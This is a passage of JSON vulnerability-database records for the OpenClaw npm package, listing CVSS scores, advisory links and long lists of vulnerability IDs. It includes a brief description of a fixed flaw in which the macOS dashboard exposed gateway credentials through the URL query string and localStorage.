directory.","references":[{"reference_url":"https://github.com/openclaw/openclaw/commit/1d7cb6fc03552bbba00e7cffb3aa9741f5556416","reference_id":"","reference_type":"","scores":[{"value":"6.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/1d7cb6fc03552bbba00e7cffb3aa9741f5556416"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-v8wv-jg3q-qwpq","reference_id":"","reference_type":"","scores":[{"value":"6.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-v8wv-jg3q-qwpq"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33581","reference_id":"","reference_type":"","scores":[{"value":"6.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textua
l","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33581"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-arbitrary-file-read-via-mediaurl-and-fileurl-parameters","reference_id":"","reference_type":"","scores":[{"value":"6.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-arbitrary-file-read-via-mediaurl-and-fileurl-parameters"},{"reference_url":"https://github.com/advisories/GHSA-3gr8-2752-h46q","reference_id":"GHSA-3gr8-2752-h46q","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-3gr8-2752-h46q"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/110567?format=json","purl":"pkg:npm/openclaw@2026.3.24","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vuln
erability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5dj5-mk23-kyds"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-66nc-bn98-nbas"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-acy1-83py-efhr"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vuln
erability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vuln
erability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-utv2-tyje-kfht"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vv2u-u7mn-rfe1"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vuln
erability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.24"}],"aliases":["GHSA-3gr8-2752-h46q"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-26sv-grsd-abcw"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50777?format=json","vulnerability_id":"VCID-2927-2whr-sudd","summary"
:"OpenClaw's dashboard leaked gateway auth material via browser URL/query and localStorage\nOpenClaw's macOS Dashboard flow exposed Gateway authentication material to browser-controlled surfaces.\n\nBefore the fix, the macOS app appended the shared Gateway `token` and `password` to the Dashboard URL query string when opening the Control UI in the browser. The Control UI then imported the token and persisted it into browser `localStorage` under `openclaw.control.settings.v1`.\n\nThis expanded exposure of reusable Gateway admin credentials into browser address-bar/query surfaces and persistent script-readable storage.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/10d0e3f3ca92326df0ca071fabffe463742f263c","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/10d0e3f3ca92326df0ca071fabffe463742f263c"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.7","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.7"},{"reference_url":"https://github.com/advisories/GHSA-rchv-x836-w7xp","reference_id":"GHSA-rchv-x836-w7xp","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"
https://github.com/advisories/GHSA-rchv-x836-w7xp"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-rchv-x836-w7xp","reference_id":"GHSA-rchv-x836-w7xp","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-rchv-x836-w7xp"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74554?format=json","purl":"pkg:npm/openclaw@2026.3.7","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-1y7e-y41k-qyfc"},{"vulnerability":"VCID-21eb-723m-xkfu"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2jsx-pvnr-6ydn"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-38
4t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-54mc-t5s7-wyes"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-5u41-c7kc-u7fe"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84fd-3yvx-rfgq"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9u
yu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2t8-px5b-nfgd"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-aawy-8xg4-1uen"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-afkf-r949-dkgu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b7hq-mrhg-b3bk"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dsvn-dpb5-tfdz"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e2
5p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-ebwd-3xp4-7fdp"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-g9jn-c2rf-byem"},{"vulnerability":"VCID-gj27-bfws-uyfp"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h4av-vgqn-aqcn"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hse8-g1e9-dbay"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcba-tshp-77d6"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kh5u-hg46-3qha"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mg
gy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-p984-bgmq-zqc9"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fc